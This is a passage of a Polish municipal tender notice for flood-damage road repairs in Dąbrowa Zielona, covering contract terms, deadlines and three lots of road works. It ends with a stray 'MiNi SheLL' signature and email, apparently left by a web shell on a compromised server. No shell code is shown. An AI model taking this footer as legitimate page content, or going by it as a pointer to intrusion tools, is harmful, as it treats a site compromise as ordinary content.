Uwaga: Wykonawca, którego oferta zostanie uznana za najkorzystniejszą, zobowiązany  będzie do wykonania i przedłożenia Zamawiającemu, w terminie do 7 dni od daty podpisania umowy, kosztorysu opracowanego metodą kalkulacji szczegółowej oddzielnie dla każdego zadania. Wyliczone w kosztorysach ceny muszą być zgodne z cenami przedstawioną w ofercie przetargowej. Ponieważ obowiązującym wynagrodzeniem jest wynagrodzenie ryczałtowe, kosztorysy będą jedynie dokumentem, który będzie wykorzystywany do obliczenia należnego wynagrodzenia Wykonawcy w przypadku odstąpienia od umowy, a więc w sytuacji uregulowanej w § 12 umowy.

Upoważnienie osób podpisujących ofertę do jej podpisania musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny wykonawcy, to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Terminy ustalone w ust. 1 ulegną przesunięciu na pisemny wniosek Wykonawcy w przypadku wystąpienia opóźnień wynikających z:
a)	przestojów i opóźnień zawinionych przez Zamawiającego,
b)	działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mającego bezpośredni wpływ na terminowość wykonywania robót,
c) wystąpienia warunków atmosferycznych uniemożliwiających wykonywanie robót - fakt ten musi zostać zgłoszony Zamawiającemu i musi zostać potwierdzony przez inspektora nadzoru,
d)	wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności.

W przedstawionych w ust. 3 przypadkach wystąpienia opóźnień, strony ustalą nowe terminy, z tym że maksymalny okres przesunięcia terminu zakończenia realizacji przedmiotu umowy równy będzie okresowi przerwy lub postoju.

Istnieje możliwość dokonania zmiany kierownika budowy jedynie za uprzednią pisemną zgodą Zamawiającego

Wykonawca z własnej inicjatywy proponuje zmianę osoby wyszczególnionej w ust. 6 paragrafu 7 w następujących przypadkach:
a)	śmierci, choroby lub innych zdarzeń losowych dotyczących beżposrednio tej osoby,
b) jeżeli zmiana tej osoby stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy.

W przypadku zmiany osoby wyszczególnionej w ust. 6 paragrafu 7 , nowa osoba powołana do pełnienia w/w obowiązków musi spełniać wymagania określone w specyfikacji istotnych warunków zamówienia dla danej funkcji.

Zamawiający może także zażądać od Wykonawcy zmiany osoby, o której mowa w ust. 6 paragrafu 7, jeżeli uzna, że nie wykonuje należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany tej osoby w terminie nie dłuższym niż 7 dni od daty złożenia wniosku Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.dabrowazielona.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy
Plac Kościuszki 31
42-265 Dąbrowa Zielona.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2012 godzina 10:00, miejsce: Urząd Gminy
Plac Kościuszki 31
42-265 Dąbrowa Zielona
Punkt obsługi klienta - parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont dróg gminnych na terenie sołectwa Dabrowa Zielona w ramach usuwania skutków  powodzi w maju 2010r w miejscowości ZALAS BIEDY droga na działce nr 1058- odcinek od Km0+000 do Km 0+925- etap I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac dla Zadania I obejmuje następujące roboty:
- roboty pomiarowe - odtworzenie trasy i punktów wysokościowych, ustalenie niwelety drogi,
- ręczne karczowanie zalegających zagajników odcinkami w koronie drogi,
- mechaniczne wykonanie koryta drogi gł. 20 cm z transportem urobku na odl. 3 km.
- mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne,
- regulacja urządzeń wod-kan,
- wykonanie podbudowy dolnej gr.22 cm kruszywem stabilizowanym mechanicznie wg. normy PN-S-06-102,
- wykonanie górnej podbudowy gr. 8 cm kruszywem stabilizowanym mechanicznie wg. normy PN-S-06-102,
- wymiana załamanego przepustu pod koroną drogi z rur  PEHD fi 600 mm,
- oczyszczenie i skropienie podbudowy emulsją szybko rozpadową w ilości 0,8 kg/m2,
- wykonanie warstwy ścieralnej z betonu asfaltowego AC11S gr. 5 cm dla ruchu (KR-3-4) g WT2,
- utwardzenie pobocza po obydwu stronach ulicy szer. 2 x 0,70 m kruszywem, stabilizowanym mechanicznie gr. 8 cm wg normy PN-S-06-101,
- renowacja zamulonego rowu z ujściem do rowu,
- wykonanie rowów przydrożnych odcinkami,
- umocnienie rowu płytami ażurowymi gr.10 cm , z wypełnieniem przestrzeni gruntem rodzimym,
- wykonanie poręczy rurowych na remontowanym przepuście,
- ułożenie nawierzchni na zjazdach do posesji z AC11-S gr.4 cm gr. 4 cm. dla ruchu (KR-3-4) g WT2,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.31.40-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont dróg gminnych na terenie sołectwa Dabrowa Zielona w ramach usuwania skutków  powodzi w maju 2010r. w miejscowości DĄBROWA ZIELONA droga na działkach nr 2299 i 211 (końcowy odcinek drogi o nr ewid. 211 na terenie sołectwa Olbrachcice)-odcinek od Km 0+000 do Km 2+250 - etap I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac dla Zadania II obejmuje następujące roboty na odcinkach: 
Odcinek I Km 0+000 do Km 0+ 364
- roboty pomiarowe - wyznaczenie niwelety drogi,
- wykonanie koryta drogi na gł. 30 cm z wywozem urobku na odl. 4 km,
- profilowanie koryta i zagęszczenie na Km 0+ 000 do Km 0+364,
- ułożenie krawężników betonowych 15 x 30 na ławie betonowej , 
- wykonanie dolnej podbudowy gr. 25 cm,
- wykonanie górnej podbudowy z frezu gr. 5,0 cm,
- ręczne plantowanie gruntu rodzimego na szer. 2x 0,5 m,
- skropienie podbudowy emulsją szybko - rozpadową podbudowy w ilości 08 kg/m2
- dywanik - warstwa ścieralna gr. 5 cm  o uziarnieniu ciągłym AC 11 S na lepiszczu 
  50/70 (dla KR 3-4) wg. WT2
Odcinek II Km 0 + 364 do Km 2+ 070
- roboty pomiarowe - wyznaczenie niwelety drogi,
- wycinka krzaków , podszycia i samosiewów,
- profilowanie koryta i zagęszczenie podłoża,
- wykonanie dolnej podbudowy gr. 20 cm z kruszywa z odzysku ze składowiska,
- załadunek i transport kruszywa z odzysku z podbudowy na odl. 4 km,
- wykonanie górnej podbudowy z żużla EHZ gr. 5 cm,
- wykonanie rowu przydrożnego,
- przepusty z rur polietylenowych typu PEHD o śr. nominalnej 400 mm - rury o długości 
  6,0m 4 szt.
Km od 2+ 070 do Km 2+ 250
- wykonanie koryta drogi z transportem urobku ziemnego na odl. 4 km,
- wykonanie dolnej podbudowy gr. 25 cm z kruszywa łamanego stabilizowanego 
  mechanicznie wg PN S-06-102
- wykonanie górnej podbudowy gr. 5 cm z frezu,
- skropienie podbudowy emulsją szybko - rozpadową podbudowy w ilości 08 kg/m2
- dywanik - warstwa ścieralna gr. 5 cm o uziarnieniu ciągłym AC 11 S na lepiszczu 50/70 (dla KR 3-4) wg. WT2 ,
- plantowanie obustronnych poboczy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.31.40-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont dróg gminnych na terenie sołectwa Dabrowa Zielona w ramach usuwania skutków  powodzi w maju 2010r. w miejscowości DĄBROWA ZIELONA droga na działce nr 1386-odcinek od Km 0+000 do Km 0+500 - etap I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac dla Zadania III obejmuje następujące roboty:
- roboty pomiarowe - odtworzenie trasy i punktów wysokościowych , 
- ręczne karczowanie zalegających zagajników odcinkami w koronie drogi,
- mechaniczne wykonanie koryta drogi z transportem urobku na odl. 4 km.,
- mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne,
- formowanie nasypu z gruntu odcinkami w celu utrzymania niwelety drogi,
- regulacja urządzeń wod-kan,
- wykonanie podbudowy dolnej gr. 25 cm kruszywem stab. mechanicznie wg normy 
  PN-S-06-102
- wykonanie górnej podbudowy gr. 10 cm kruszywem stab. mechanicznie wg normy
  PN-S-06-102
- zabudowa krawężników 15 x 30 na ławie betonowej z oporem - na  Km od 0+000 do 
  Km 0+030,
- oczyszczenie i skropienie podbudowy emulsją szybko rozpadową w ilości 0,8 kg/m2,
- wykonanie warstwy ścieralnej z betonu asfaltowego na Km od 0+000 do Km 0+ 250 
  AC11-S gr. 5 cm dla ruchu (KR-3-4) wg WT2 na bazie lepiszcza 50/70,
- utwardzenie pobocza po obydwu stronach drogi szer. 2 x 0,65 m kruszywem
  stabilizowanym mechanicznie gr. 7 cm  na odcinku na którym jest BA wg normy
  PN-S-06-102,
- ułożenie nawierzchni na zjazdach do gospodarstw z AC11-S gr. 5 cm dla ruchu (KR-3-4) wg WT2 na bazie lepiszcza 50/70,
- wzmocnienie podbudowy z frezu na zjazdach do gospodarstw gr. 10 cm,
- remont skarpy nasypu z trylinki - ( remont bruku o grub. 15 cm z kostek sześciokątnych na koronach nasypu),
- wykonanie odwodnienia liniowego na szerokości jezdni,
- montaż wpustu ulicznego szt. 1,
- zabudowa studni chłonnych szt. 2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.31.40-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com